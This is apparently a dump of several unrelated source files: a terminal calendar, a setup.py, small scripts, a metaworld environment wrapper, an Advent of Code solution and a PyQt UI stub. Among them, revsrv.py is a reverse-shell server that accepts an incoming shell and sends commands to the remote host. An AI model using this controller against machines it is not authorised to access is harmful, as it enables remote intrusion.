            if usr_ind == self.YEAR:
                year, month = self.today.year + sgn, self.today.month
            elif usr_ind == self.DAY:
                # timedelta rolls the month/year over automatically
                self.today = self.today + timedelta(days=sgn)
                return
            else:  # Scroll by month is default
                year, month = self.today.year, self.today.month + sgn
                if month < 1:
                    month, year = 12, year - 1
                elif month > 12:
                    month, year = 1, year + 1
            # clamp the day so month-ends (and Feb 29) remain valid dates
            self.today = date(year, month, min(self.today.day, monthrange(year, month)[1]))
def eventing(self, usr_input: str):
"""
parse event commands from the user and edit self.events dict
Args:
usr_input : string input by the user. Should be led by a valid event based command
"""
cmd = usr_input[0]
if len(usr_input) > 1:
usr_args = usr_input[1:]
else:
usr_args = None
if usr_args is None:
calendar_date = prompt_user_date("Lets get a date for the event")
name = input("Give us a name for the event : ")
else:
usr_args = usr_args.split("-")[:2]
calendar_date = parse_user_date(usr_args[0])
if len(usr_args) >= 2:
name = usr_args[1]
else:
name = input(f"What is the name of the event to be {Calendar.VERB[cmd]}")
if cmd == self.NEW:
self.add_event(calendar_date, name)
input(f"new event created {self.get_event(calendar_date, name)}")
if cmd == self.MODIFY or cmd == self.READ:
if name in self.find_events(calendar_date).keys():
if cmd == self.MODIFY:
mod_event = self.get_event(calendar_date, name)
mod_event.modify()
self.update_event(mod_event, calendar_date, name)
input(f"Modified event : {mod_event}")
else:
input(self.get_event(calendar_date, name))
else:
input("The event you described does not exist. Back to main menu ")
def update_event(self, modified_event: Event, old_date: DateTypes, old_name: str):
"""
Checks event after it's been modified and rewrites it to the dict with updated indeces
"""
input("Hello There")
new_ev = self.get_event(modified_event.date_of_event, modified_event.name)
old_ev = self.get_event(old_date, old_name)
if new_ev != old_ev:
input("General Kenobi")
pop_str = f"{old_date.year}.{old_date.month}.{old_date.day}.{old_name}"
self.events.pop(pop_str)
Calendar.clean_nested_dict(self.events)
self.events[
self.ind_from_date(modified_event.date_of_event, modified_event.name)
] = modified_event
def print_all_events(self):
prnt = "{\n"
for year, months in self.events.items():
prnt += f"\t{year} : " + "{\n"
for month, days in months.items():
prnt += f"\t\t{month} : " + "{\n"
for day, names in days.items():
prnt += f"\t\t\t{day} : " + "{\n"
for name, ev in names.items():
ev_str = repr(ev).replace("\n", "\n\t\t\t\t\t")
prnt += f"\t\t\t\t{name}\t{ev_str}\n"
prnt += "\t\t\t},\n"
prnt += "\t\t},\n"
prnt += "\t},\n"
prnt += "}"
input(prnt)
@staticmethod
def clean_nested_dict(nested_dict):
"""
Recursively cleans nested_dict to remove empty dicts and subdicts
Believe it or not this works. Checkout the Calendar testing ipython notebook.
"""
# if lowest level item is not an empty dict, don't pop this, or parents
if not isinstance(nested_dict, dict):
return False
# if lowest level item is an empty dict, pop this from the parent and clean up recursively
if nested_dict == {}:
return True
# indicates whether this dict/sub_dict should be "popped" (cleaned up)
pop_this = True
for key, sub_dict in list(nested_dict.items()):
pop_that = Calendar.clean_nested_dict(sub_dict)
if pop_that:
nested_dict.pop(key)
pop_this *= pop_that
return pop_this
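
    # e.g. Calendar.clean_nested_dict({'a': {'b': {}}, 'c': {'d': 1}}) prunes
    # the empty 'a' branch, keeps 'c', and returns False (top level non-empty).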
@staticmethod
def ind_from_date(calendar_date: DateTypes, name: str = None):
"""
Args:
calendar_date : date to be used for indexing
name : optional. Tacked on to return if included
Returns:
            year (str), month (str), day (str), and optionally name (str)
"""
if name is not None:
return str(calendar_date.year), str(calendar_date.month), str(calendar_date.day), name
else:
return str(calendar_date.year), str(calendar_date.month), str(calendar_date.day)
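
    # e.g. Calendar.ind_from_date(date(2024, 2, 29), 'demo')
    #      -> ('2024', '2', '29', 'demo')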
def get_event(self, calendar_date: DateTypes, name: str) -> Event:
"""
Gets an event from a name and a date
Args:
calendar_date : date of the event
name : name of the event:
Returns:
The event found. Or None if none are found
"""
try:
ev = self.events[self.ind_from_date(calendar_date, name)]
except KeyError:
ev = None
return ev
def find_events(self, calendar_date: DateTypes) -> Dict:
"""
finds all events that occur on calendar_date and returns them
Args:
calendar_date : date or datetime object where we're looking for events
Returns:
daily events : dictionary of events occurring on that day, empty dict if there are none
"""
try:
daily_events = self.events[self.ind_from_date(calendar_date)]
except KeyError:
daily_events = {}
return daily_events
def add_event(self, calendar_date: DateTypes, name: str):
"""
Adds an event to the calendar
Args:
calendar_date : date of the new event
name : name of that event
"""
while name in self.find_events(calendar_date).keys():
overwrite = input(
f"Another event is named {name} on that date. Do you wish to overwrite it? (Y/n) : "
f"Other event : {self.get_event(calendar_date, name)}\n"
)
overwrite = overwrite.upper() != "N"
if not overwrite:
name = input(f"Please enter a new name for the event : ")
else:
break
description = input("Give us a brief description of the event : \n")
if input("Do you wish to specify a time? (y/N)").upper() != "Y":
self.events[self.ind_from_date(calendar_date, name)] = Event(
calendar_date,
name,
description,
)
else:
self.events[self.ind_from_date(calendar_date, name)] = Event(
calendar_date,
name,
description,
prompt_user_time("What time do you want to set?")
)
def print_calendar(self):
"""
        Prints a calendar to the terminal/console for the month containing self.today.
"""
def color_entry(message: str, txt: str = "normal", bg: str = "normal") -> str:
"""
turns message into a colorful version of itself
Args:
message : message to be beautified
txt : string indicating color of text
bg : string indicating color of background
Returns:
beautified message
"""
txt_colors = {
"black": "30",
"red": "31",
"green": "32",
"yellow": "33",
"blue": "34",
"purple": "35",
"cyan": "36",
"white": "37",
"normal": 1
}
bg_colors = {
"black": f"{37+10}",
"red": f"{31 + 10}",
"green": f"{32 + 10}",
"yellow": f"{33 + 10}",
"blue": f"{34 + 10}",
"purple": f"{35 + 10}",
"cyan": f"{36 + 10}",
"white": f"{30 + 10}",
"normal": 1
}
return f"\033[1;{txt_colors[txt]};{bg_colors[bg]}m{message}\033[0m"
        os.system('cls' if os.name == 'nt' else 'clear')  # clear screen cross-platform
# Find which day of the week the month started on
first_day = date(self.today.year, self.today.month, 1).weekday()
# Find number of days in month
num_days = monthrange(self.today.year, self.today.month)[1]
try:
monthly_events = list(self.events[str(self.today.year), str(self.today.month)].keys())
monthly_events = [int(dy) for dy in monthly_events]
except KeyError:
monthly_events = []
cal_string = ""
# Print month and year
cal_string += color_entry(
f"{self.MONTHS[self.today.month]} : {self.today.year}\n",
txt="cyan"
)
# Print the days of the week
for day in self.WEEKDAYS:
cal_string += f"{day} "
cal_string += "\n"
days = 0
while days < num_days:
for i, day in enumerate(self.WEEKDAYS):
if days == 0 and i < first_day:
entry = " "
else:
days += 1
entry = f"{days:2} "
if days in monthly_events and not days == self.today.day:
entry = color_entry(entry, txt="green")
if days == self.today.day and days not in monthly_events:
entry = color_entry(entry, bg="red")
if days == self.today.day and days in monthly_events:
entry = color_entry(entry, txt="green", bg="red")
if days > num_days:
entry = " "
cal_string += entry
cal_string += "\n"
print(cal_string)
if __name__ == '__main__':
cal = Calendar()
cal.command_loop()
| 3.96875 | 4 |
setup.py | axel-sirota/IEEE-CICD | 0 | 12797994 | <filename>setup.py
from setuptools import setup
setup(name='funniest_ieee',
version='0.5',
description='The funniest_ieee joke in the world',
url='https://github.com/axel-sirota/IEEE-CICD',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
      keywords=["class", "attribute", "boilerplate"],
      classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
],
packages=['funniest_ieee'],
install_requires=[
'nose',
'pylint',
'coverage',
'nosexcover',
'flake8',
'twine'
],
test_suite='nose.collector',
tests_require=['nose']
)
| 1.226563 | 1 |
Python/sum.py | AbdalrohmanGitHub/Logik | 13 | 12797995 | <gh_stars>10-100
# This program reads a number n and computes the sum 1 + 2 + ... + n.
n = input('Type a natural number and press return: ')
n = int(n)
s = { i for i in range(1, n+1) }
s = sum(s)
print('The sum 1 + 2 + ... + ', n, ' is equal to ', s, '.', sep='')
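# Footnote (addition): the loop is equivalent to Gauss's closed form
# s = n * (n + 1) // 2.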
| 3.875 | 4 |
enrollment/views/__init__.py | Siikakala/kompassi | 0 | 12797996 | <reponame>Siikakala/kompassi
# encoding: utf-8
from .enrollment_event_box_context import enrollment_event_box_context
from .enrollment_enroll_view import enrollment_enroll_view
from .enrollment_admin_view import enrollment_admin_view
from .enrollment_admin_special_diets_view import enrollment_admin_special_diets_view
from .enrollment_admin_menu_items import enrollment_admin_menu_items
| 0.847656 | 1 |
environments/metaworld/reach_ml1.py | bryanoliveira/varibad | 0 | 12797997 | import numpy as np
import gym
from random import randint
from metaworld.benchmarks import ML1
class ReachML1Env(gym.Env):
def __init__(self, max_episode_steps=150,out_of_distribution=False, n_train_tasks=50, n_test_tasks=10, **kwargs):
super(ReachML1Env, self).__init__()
self.train_env = ML1.get_train_tasks('reach-v1', out_of_distribution=out_of_distribution)
self.test_env = ML1.get_test_tasks('reach-v1', out_of_distribution=out_of_distribution)
self.train_tasks = self.train_env.sample_tasks(n_train_tasks)
self.test_tasks = self.test_env.sample_tasks(n_test_tasks)
self.tasks = self.train_tasks + self.test_tasks
self.env = self.train_env #this env will change depending on the idx
self.observation_space = self.env.observation_space
self.action_space = self.env.action_space
self.goal_space_origin = np.array([0, 0.85, 0.175])
self.current_task_idx = 0
self.episode_steps = 0
self._max_episode_steps = max_episode_steps
# self.get_tasks_goals()
# self.reset_task()
def step(self, action):
self.episode_steps += 1
obs, reward, done, info = self.env.step(action)
if self.episode_steps >= self._max_episode_steps:
done = True
return obs, reward, done, info
def reset(self):
self.episode_steps = 0
return self.env.reset()
def seed(self, seed):
self.train_env.seed(seed)
self.test_env.seed(seed)
def get_all_task_idx(self):
return range(len(self.tasks))
def set_task(self, idx):
self.current_task_idx = idx
self.env = self.train_env if idx < len(self.train_tasks) else self.test_env
self.env.set_task(self.tasks[idx])
self._goal = self.tasks[idx]['goal']
def get_task(self):
return self.tasks[self.current_task_idx]['goal'] # goal_pos
def reset_task(self, task=None, test=False):
        # apparently this is called only without idx, so tasks are always scrambled;
        # we only need to distinguish the train vs. test index ranges when sampling
if task is None:
if test:
task = randint(len(self.train_tasks), len(self.tasks) - 1)
else:
task = randint(0, len(self.train_tasks) - 1)
self.set_task(task)
def render(self):
self.env.render()
def get_tasks_goals(self):
for idx in range(len(self.tasks)):
self.reset_task(idx)
_, _, _, info = self.step(self.action_space.sample())
self.tasks[idx]['goal_pos'] = info['goal']
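
# Rollout sketch (illustrative; assumes metaworld's ML1 benchmark is installed):
#   env = ReachML1Env()
#   env.reset_task(test=False)
#   obs = env.reset()
#   obs, reward, done, info = env.step(env.action_space.sample())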
| 2.46875 | 2 |
day20.py | hubbardgary/AdventOfCode | 0 | 12797998 | # --- Day 20: Infinite Elves and Infinite Houses ---
#
# To keep the Elves busy, Santa has them deliver some presents by hand, door-to-door. He sends them down a street with
# infinite houses numbered sequentially: 1, 2, 3, 4, 5, and so on.
#
# Each Elf is assigned a number, too, and delivers presents to houses based on that number:
#
# The first Elf (number 1) delivers presents to every house: 1, 2, 3, 4, 5, ....
# The second Elf (number 2) delivers presents to every second house: 2, 4, 6, 8, 10, ....
# Elf number 3 delivers presents to every third house: 3, 6, 9, 12, 15, ....
#
# There are infinitely many Elves, numbered starting with 1. Each Elf delivers presents equal to ten times his or her
# number at each house.
#
# So, the first nine houses on the street end up like this:
#
# House 1 got 10 presents.
# House 2 got 30 presents.
# House 3 got 40 presents.
# House 4 got 70 presents.
# House 5 got 60 presents.
# House 6 got 120 presents.
# House 7 got 80 presents.
# House 8 got 150 presents.
# House 9 got 130 presents.
#
# The first house gets 10 presents: it is visited only by Elf 1, which delivers 1 * 10 = 10 presents. The fourth house
# gets 70 presents, because it is visited by Elves 1, 2, and 4, for a total of 10 + 20 + 40 = 70 presents.
#
# What is the lowest house number of the house to get at least as many presents as the number in your puzzle input?
#
# --- Part Two ---
#
# The Elves decide they don't want to visit an infinite number of houses. Instead, each Elf will stop after delivering
# presents to 50 houses. To make up for it, they decide to deliver presents equal to eleven times their number at each
# house.
#
# With these changes, what is the new lowest house number of the house to get at least as many presents as the number
# in your puzzle input?
from math import sqrt
def get_part1_factors(n):
factors = set()
for x in range(1, int(sqrt(n)) + 1):
if n % x == 0:
factors.add(x)
factors.add(n // x)
return factors
def get_part2_factors(n):
factors = set()
for x in range(1, int(sqrt(n)) + 1):
if n % x == 0:
if x * 50 >= n:
factors.add(x)
if (n // x) * 50 >= n:
factors.add(n // x)
return factors
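
# Divisors come in pairs (x, n // x), so scanning up to sqrt(n) finds them
# all; part 2 keeps elf e only while e * 50 >= n, i.e. house n is still
# within that elf's 50-house limit.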
data = 33100000
# Part 1
house_no = 1
while True:
presents = sum(map(lambda i: i*10, get_part1_factors(house_no)))
if presents >= data:
print("House no: {0}".format(house_no))
break
house_no += 1
# Part 2
house_no = 1
while True:
presents = sum(map(lambda i: i*11, get_part2_factors(house_no)))
if presents >= data:
print("House no: {0}".format(house_no))
break
house_no += 1
| 3.875 | 4 |
default.py | aerth/plugin.audio.partymoder | 0 | 12797999 | # partymoder xbmc add-on
# Copyright 2017 aerth <<EMAIL>>
# Released under the terms of the MIT License
import xbmc
xbmc.executebuiltin('xbmc.PlayerControl(Partymode(music))', True)
xbmc.executebuiltin('xbmc.PlayerControl(repeatall)', True)
xbmc.executebuiltin("Action(Fullscreen)", True)
| 1.734375 | 2 |
src/third_party/angle/third_party/glmark2/src/waflib/Tools/dmd.py | goochen/naiveproxy | 2,151 | 12798000 | <reponame>goochen/naiveproxy
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
import sys
from waflib.Tools import ar,d
from waflib.Configure import conf
@conf
def find_dmd(conf):
conf.find_program(['dmd','dmd2','ldc'],var='D')
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find("D Compiler v")==-1:
out=conf.cmd_and_log(conf.env.D+['-version'])
if out.find("based on DMD v1.")==-1:
conf.fatal("detected compiler is not dmd/ldc")
@conf
def common_flags_ldc(conf):
v=conf.env
v.DFLAGS=['-d-version=Posix']
v.LINKFLAGS=[]
v.DFLAGS_dshlib=['-relocation-model=pic']
@conf
def common_flags_dmd(conf):
v=conf.env
v.D_SRC_F=['-c']
v.D_TGT_F='-of%s'
v.D_LINKER=v.D
v.DLNK_SRC_F=''
v.DLNK_TGT_F='-of%s'
v.DINC_ST='-I%s'
v.DSHLIB_MARKER=v.DSTLIB_MARKER=''
v.DSTLIB_ST=v.DSHLIB_ST='-L-l%s'
v.DSTLIBPATH_ST=v.DLIBPATH_ST='-L-L%s'
v.LINKFLAGS_dprogram=['-quiet']
v.DFLAGS_dshlib=['-fPIC']
v.LINKFLAGS_dshlib=['-L-shared']
v.DHEADER_ext='.di'
v.DFLAGS_d_with_header=['-H','-Hf']
v.D_HDR_F='%s'
def configure(conf):
conf.find_dmd()
if sys.platform=='win32':
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find('D Compiler v2.')>-1:
conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead')
conf.load('ar')
conf.load('d')
conf.common_flags_dmd()
conf.d_platform_flags()
if str(conf.env.D).find('ldc')>-1:
conf.common_flags_ldc()
| 1.757813 | 2 |
blog/admin.py | sandipsandal/Just-A-Thought | 0 | 12798001 | from django.contrib import admin
from blog.models import Post, BlogComment, Category
# Register your models here.
admin.site.register((BlogComment,))  # register accepts a single model or a tuple of models
admin.site.register(Category)
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
class Media:
js = ("tinyInject.js",)
| 1.765625 | 2 |
backend/appengine/routes/subjects/edit.py | MarcosVn/turinginformatica | 0 | 12798002 | <filename>backend/appengine/routes/subjects/edit.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from google.appengine.ext import ndb
from course.course_model import Subject, Course
from config.template_middleware import TemplateResponse
from gaecookie.decorator import no_csrf
from gaepermission.decorator import login_not_required
from routes import subjects
from tekton.gae.middleware.redirect import RedirectResponse
from tekton.router import to_path
__author__ = 'marcos'
@no_csrf
@login_not_required
def index(subject_id):
subject = Subject.get_by_id(int(subject_id))
ctx={'subject': subject,
'salvar_path': to_path(atualizar)
}
ctx["courses"] = Course.query_ordenada_por_nome().fetch()
return TemplateResponse(ctx, 'subjects/subject_form.html')
@login_not_required
def atualizar(subject_id, name, activities, course):
subject = Subject.get_by_id(int(subject_id))
subject.name = name
subject.activities = activities
subject.course = ndb.Key(Course, int(course))
subject.put()
return RedirectResponse(subjects) | 2.234375 | 2 |
code/Algorithms/RandomChoice.py | BogyMitutoyoCTL/Snake-AI-2021.1 | 0 | 12798003 | <filename>code/Algorithms/RandomChoice.py
from random import random
from Algorithms.Algorithms import Algorithm
from GameData import GameData
class RandomChoice(Algorithm):
def __init__(self):
super().__init__()
"""
A stupid algorithm that returns a random value.
This can be used for comparisons with other algorithms.
Best result: length 4 on a 10x20 field in 1000 epochs
"""
def decide(self, info: GameData) -> str:
r = int(random() * 3)
if r == 0:
return "turn left"
elif r == 1:
return "turn right"
else:
return "straight"
| 3.71875 | 4 |
network/revsh/revsrv.py | dogoncouch/dogoncouch-misc | 3 | 12798004 | #!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 <NAME> (<EMAIL>)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from argparse import ArgumentParser
import socket
from sys import exit, stdout
from time import sleep
__version__ = '0.1'
class RSSrvCore:
def __init__(self):
"""Initialize a shell server"""
self.args = None
self.arg_parser = ArgumentParser()
def get_args(self):
"""Set argument options"""
self.arg_parser.add_argument('--version', action = 'version',
version = '%(prog)s ' + str(__version__))
self.arg_parser.add_argument('-f',
action = 'store_true', dest = 'force',
help = ('bind to sockets that are already in use'))
self.arg_parser.add_argument('port',
action = 'store', type=int,
help = ('set the local port'))
self.args = self.arg_parser.parse_args()
def main_event(self, force=False):
"""Connect to an incoming shell"""
s = socket.socket()
if force:
print('Enabling socket address reuse.')
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Binding to port ' + str(self.args.port))
s.bind(('0.0.0.0', self.args.port))
s.listen(1)
conn, host = s.accept()
print('Received connection from ' + str(host[0]) + \
':' + str(host[1]) + '.')
		# decode the bytes instead of slicing their repr, which would mangle escapes
		remotehost, remotepyversion = conn.recv(1024).decode('utf8').split(':')
print('Remote hostname: ' + remotehost + '.\n' + \
'Remote Python major version: ' + remotepyversion + \
'.\nEnter h for help.')
remotepyversion = int(remotepyversion)
if remotehost.split('@')[0] == 'root':
promptsuffix = ' # '
else:
promptsuffix = ' $ '
		print('Type exit or enter EOF (ctrl-d) to exit.')
		lastcmd = '\n'  # so a leading '!' repeats a no-op instead of raising NameError
		while True:
try:
cmd = input(remotehost + promptsuffix)
if cmd == '!':
cmd = lastcmd
elif cmd == '':
cmd = '\n'
if cmd == 'exit':
conn.send(bytes(cmd, 'utf8'))
conn.close()
s.close()
exit(0)
elif cmd == 'drop':
conn.send(bytes('exit', 'utf8'))
conn.close()
s.close()
return 0
elif cmd == 'detach':
conn.send(bytes(cmd, 'utf8'))
conn.close()
s.close()
exit(0)
elif cmd == 'h':
self.show_help()
else:
conn.send(bytes(cmd, 'utf8'))
					recdata = conn.recv(16384)
					if remotepyversion == 2:
						# recv() yields bytes, so compare against bytes rather than the str ':'
						if recdata and recdata != bytes(':', 'utf8'):
stdout.buffer.write(recdata)
else:
if recdata and recdata != bytes('\n', 'utf8'):
stdout.buffer.write(recdata)
lastcmd = cmd
except EOFError:
conn.send(bytes('exit', 'utf8'))
print('exit')
conn.close()
s.close()
exit(0)
def show_help(self):
"""Show help for shell options"""
h = []
h.append('\nCommand Description')
h.append('-----------------------------')
h.append('h show this help menu')
h.append('exit close program (local and remote)')
h.append('drop close shell, keep server running')
h.append('detach close shell, keep client running')
h.append('cd DIR change directory')
h.append('')
print('\n'.join(h))
def run_script(self):
"""Run the shell server program"""
try:
self.get_args()
self.main_event(force=self.args.force)
while True:
self.main_event(force=True)
except KeyboardInterrupt:
print('\nExiting on KeyboardInterrupt')
def main():
thing = RSSrvCore()
thing.run_script()
if __name__ == "__main__":
main()
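
# Example session (port number hypothetical):
#
#     $ ./revsrv.py -f 4444     # listen for a reverse shell on port 4444
#
# The matching client is expected to connect back and send "hostname:pyversion"
# as its first message, as main_event() above assumes.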
| 1.953125 | 2 |
testing/test_GitWrapper_committing.py | jkpubsrc/python-module-jk-git | 0 | 12798005 | <filename>testing/test_GitWrapper_committing.py
#!/usr/bin/python3
import os
import typing
import tempfile
import jk_json
import jk_logging
import jk_typing
import jk_git
from TestHelper import TestHelper
with jk_logging.wrapMain() as log:
with TestHelper(log) as th:
th.createRepository(log)
th.createSingleFileAndCommitIt("foo1.txt", "mycommitmsg1", log)
th.createSingleFileAndCommitIt("foo2.txt", "mycommitmsg2", log)
"""
with log.descend("Creating another file and committing it ...") as log2:
filePath = os.path.join(tempDirPath, "foo2.txt")
with open(filePath, "w") as fout:
fout.write("")
ret = git.add(tempDirPath, filePath, log=log2)
_dumpOutput(ret, log2)
ret = git.commit(tempDirPath, "mycommitmsg2", log=log2)
_dumpOutput(ret, log2)
"""
with log.descend("Creating a branch ...") as log2:
ret = th.git.createBranch(th.tempDirPath, "mybranch", log=log2)
th._dumpOutput(ret, log2)
with log.descend("Listing branches ...") as log2:
ret = th.git.listBranches(th.tempDirPath, log=log2)
th._dumpOutput(ret, log2)
assert isinstance(ret, list)
assert len(ret) == 2
assert ret[0] == " master"
assert ret[1] == "* mybranch"
"""
with log.descend("Creating even another file and committing it ...") as log2:
filePath = os.path.join(th.tempDirPath, "foo3.txt")
with open(filePath, "w") as fout:
fout.write("")
ret = th.git.add(th.tempDirPath, filePath, log=log2)
th._dumpOutput(ret, log2)
ret = th.git.commit(th.tempDirPath, "mycommitmsg3", log=log2)
th._dumpOutput(ret, log2)
"""
th.createSingleFileAndCommitIt("foo3.txt", "mycommitmsg3", log)
with log.descend("Show log ...") as log2:
ret = th.git.showLog(th.tempDirPath, log=log2)
th._dumpOutput(ret, log2)
#
| 2.609375 | 3 |
src/urh/ui/ui_analysis_frame.py | awesome-archive/urh | 1 | 12798006 | <filename>src/urh/ui/ui_analysis_frame.py
# -*- coding: utf-8 -*-
#
# Form implementation generated from reading a Qt Designer ui file.
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FAnalysis(object):
def setupUi(self, FAnalysis):
FAnalysis.setObjectName("FAnalysis")
FAnalysis.resize(1372, 907)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(FAnalysis.sizePolicy().hasHeightForWidth())
FAnalysis.setSizePolicy(sizePolicy)
FAnalysis.setFocusPolicy(QtCore.Qt.ClickFocus)
FAnalysis.setAcceptDrops(True)
FAnalysis.setFrameShape(QtWidgets.QFrame.StyledPanel)
FAnalysis.setFrameShadow(QtWidgets.QFrame.Raised)
FAnalysis.setLineWidth(1)
FAnalysis.setMidLineWidth(0)
self.verticalLayout_2 = QtWidgets.QVBoxLayout(FAnalysis)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.splitter = QtWidgets.QSplitter(FAnalysis)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.frame_2 = QtWidgets.QFrame(self.splitter)
self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.frame_2)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.splitter_2 = QtWidgets.QSplitter(self.frame_2)
self.splitter_2.setOrientation(QtCore.Qt.Horizontal)
self.splitter_2.setObjectName("splitter_2")
self.frame_4 = QtWidgets.QFrame(self.splitter_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.frame_4.sizePolicy().hasHeightForWidth())
self.frame_4.setSizePolicy(sizePolicy)
self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_4.setObjectName("frame_4")
self.verticalLayout_8 = QtWidgets.QVBoxLayout(self.frame_4)
self.verticalLayout_8.setObjectName("verticalLayout_8")
self.scrollArea = QtWidgets.QScrollArea(self.frame_4)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 320, 514))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.verticalLayout = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_5 = QtWidgets.QLabel(self.scrollAreaWidgetContents)
self.label_5.setObjectName("label_5")
self.horizontalLayout_2.addWidget(self.label_5)
self.btnSaveProto = QtWidgets.QToolButton(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnSaveProto.sizePolicy().hasHeightForWidth())
self.btnSaveProto.setSizePolicy(sizePolicy)
self.btnSaveProto.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.btnSaveProto.setBaseSize(QtCore.QSize(0, 0))
icon = QtGui.QIcon.fromTheme("document-save")
self.btnSaveProto.setIcon(icon)
self.btnSaveProto.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly)
self.btnSaveProto.setObjectName("btnSaveProto")
self.horizontalLayout_2.addWidget(self.btnSaveProto)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.treeViewProtocols = ProtocolTreeView(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.treeViewProtocols.sizePolicy().hasHeightForWidth())
self.treeViewProtocols.setSizePolicy(sizePolicy)
self.treeViewProtocols.setAcceptDrops(True)
self.treeViewProtocols.setDragEnabled(True)
self.treeViewProtocols.setDragDropOverwriteMode(False)
self.treeViewProtocols.setDragDropMode(QtWidgets.QAbstractItemView.DragDrop)
self.treeViewProtocols.setDefaultDropAction(QtCore.Qt.IgnoreAction)
self.treeViewProtocols.setObjectName("treeViewProtocols")
self.treeViewProtocols.header().setVisible(False)
self.verticalLayout.addWidget(self.treeViewProtocols)
self.label_4 = QtWidgets.QLabel(self.scrollAreaWidgetContents)
self.label_4.setObjectName("label_4")
self.verticalLayout.addWidget(self.label_4)
self.listViewParticipants = QtWidgets.QListView(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.listViewParticipants.sizePolicy().hasHeightForWidth())
self.listViewParticipants.setSizePolicy(sizePolicy)
self.listViewParticipants.setObjectName("listViewParticipants")
self.verticalLayout.addWidget(self.listViewParticipants)
self.cbProtoView = QtWidgets.QComboBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cbProtoView.sizePolicy().hasHeightForWidth())
self.cbProtoView.setSizePolicy(sizePolicy)
self.cbProtoView.setObjectName("cbProtoView")
self.cbProtoView.addItem("")
self.cbProtoView.addItem("")
self.cbProtoView.addItem("")
self.verticalLayout.addWidget(self.cbProtoView)
self.cbDecoding = QtWidgets.QComboBox(self.scrollAreaWidgetContents)
